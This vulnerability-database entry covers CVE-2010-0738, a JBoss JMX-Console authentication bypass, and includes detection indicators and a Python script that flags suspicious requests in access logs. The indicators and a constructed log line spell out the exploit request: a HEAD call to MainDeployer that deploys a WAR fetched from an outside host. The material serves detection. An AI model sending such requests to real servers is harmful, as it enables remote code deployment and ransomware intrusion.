CVE-2010-0738
published 2010-04-28


Priority: P183 · Severity: medium 5.3 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Flags: KEV · ITW · EXPLOIT · Ransomware
CISA Known Exploited Vulnerability, due 2022-06-15
Exploited in the wild
EPSS: 79.42% (99.6th percentile)
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.

Affected (17 ranges)

Vendor | Product | Version range | Fixed in
hp | procurve_manager | |
hp | procurve_manager | |
redhat | jboss_enterprise_application_platform | <= 5.1.1 |
redhat | jboss_enterprise_application_platform | |
redhat | jboss_enterprise_application_platform | |
redhat | jboss_enterprise_application_platform | |
redhat | jboss_enterprise_application_platform | |
redhat | jboss_enterprise_application_platform | |
redhat | jboss_enterprise_brms_platform | <= 5.2.0 |
redhat | jboss_enterprise_portal_platform | <= 4.3.0 |
redhat | jboss_enterprise_soa_platform | <= 5.1.1 |
redhat | jboss_enterprise_soa_platform | |
redhat | jboss_enterprise_soa_platform | |
redhat | jboss_enterprise_soa_platform | |
redhat | jboss_enterprise_soa_platform | |
redhat | jboss_enterprise_soa_platform | |
redhat | jboss_enterprise_soa_platform | |

Detection & IOCs (extracted from sources)

port: 8080
path: /jmx-console
path: /jmx-console/HtmlAdaptor
path: /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
command: action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>
  • CVE-2010-0738 is exploited by sending HTTP requests using a verb other than GET or POST (e.g., HEAD) to bypass JBoss JMX Console authentication; detect non-standard HTTP verbs targeting /jmx-console/HtmlAdaptor
  • The exploit uses a HEAD (or other non-standard) HTTP verb against /jmx-console/HtmlAdaptor to bypass access controls; alert on HTTP methods other than GET/POST to this URI
  • The servlets invoked by httpha-invoker perform access control only for GET and POST methods; monitor for non-GET/POST HTTP requests to JBoss invoker/console endpoints as an authentication bypass indicator
  • CVE-2010-0738 was actively exploited by SamSam ransomware actors targeting unpatched JBoss servers; correlate JBoss exploitation attempts with subsequent ransomware staging activity
  • The exploit deploys a WAR archive via jboss.system:service=MainDeployer; monitor for unexpected WAR deployments or HTTP requests containing 'MainDeployer' and 'deploy' parameters on JBoss servers
  • Detect platform fingerprinting attempts against JBoss by monitoring requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
  • The VERB option in the Metasploit module defaults to POST, but the CVE-2010-0738 bypass specifically requires a verb other than GET or POST (e.g., HEAD); the module logic forces HEAD when a non-GET/POST verb is configured
  • The MainDeployer-based WAR upload method requires the target JBoss server to be able to make outbound connections back to the attacker's HTTP server to fetch the WAR payload
  • CVE-2011-4085 is explicitly noted as a regression of CVE-2010-0738, meaning patching CVE-2010-0738 alone may not be sufficient if the regression is present in affected JBoss platform versions
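The detection bullets above can be turned into a small log-review script. The following Python is an added example written for this page, not code from any of the record's sources or from the Metasploit module it mentions. It assumes an Apache/Tomcat "combined"-style access log, treats /jmx-console and /invoker as the console/invoker prefixes whose access control only covers GET and POST, and runs over a few constructed (made-up) log lines embedded in the script.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log lines (combined-style format). These are
# made up for this example and are not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1" 200 5123 "-" "curl/7.68.0"
10.0.0.5 - - [12/Mar/2024:10:01:05 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=http://203.0.113.9/x.war HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.20 - admin [12/Mar/2024:10:02:00 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
192.168.1.21 - - [12/Mar/2024:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.6 - - [12/Mar/2024:10:03:00 +0000] "OPTIONS /invoker/JMXInvokerServlet HTTP/1.1" 200 0 "-" "python-requests/2.25"
"""

# Assumed prefixes of the JBoss console/invoker endpoints whose access
# control in the affected versions only applies to GET and POST.
CONSOLE_PREFIXES = ("/jmx-console", "/invoker")

# Parses the client IP, authenticated user, timestamp, request line and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def classify_request(method, target):
    """Return the indicator names triggered by one request (method + URI)."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    name = query.get("name", [""])[0]
    action = query.get("action", [""])[0]
    method_name = query.get("methodName", [""])[0]
    indicators = []
    # Bullets 1-3: any verb other than GET/POST against console/invoker paths.
    if parts.path.startswith(CONSOLE_PREFIXES) and method not in ("GET", "POST"):
        indicators.append("verb-bypass")
    # Bullet 5: MainDeployer deploy invocation carried in the query string.
    if "MainDeployer" in name and method_name == "deploy":
        indicators.append("maindeployer-deploy")
    # Bullet 6: ServerInfo MBean inspection used for platform fingerprinting.
    if action == "inspectMBean" and name == "jboss.system:type=ServerInfo":
        indicators.append("server-fingerprint")
    return indicators


def analyze_log(text):
    """Scan access log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        indicators = classify_request(m["method"], m["target"])
        if indicators:
            findings.append({
                "ip": m["ip"],
                "timestamp": m["ts"],
                "method": m["method"],
                "path": urlsplit(m["target"]).path,
                "indicators": indicators,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['method']:7} {f['path']}  -> {', '.join(f['indicators'])}")
```

On the sample input the script flags three requests: the GET ServerInfo inspection, the HEAD request carrying a MainDeployer deploy (both the verb bypass and the deployment indicator), and the OPTIONS request to the invoker servlet; the authenticated POST to the console is not flagged. Per the SamSam bullet, findings from a script like this are worth correlating with later file-drop or deployment activity on the same host rather than triaged in isolation.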

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v3.1 | 5.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck | | 5.3 | MEDIUM |
cisa | | 5.3 | MEDIUM |
vendor_redhat | | 5.3 | MEDIUM |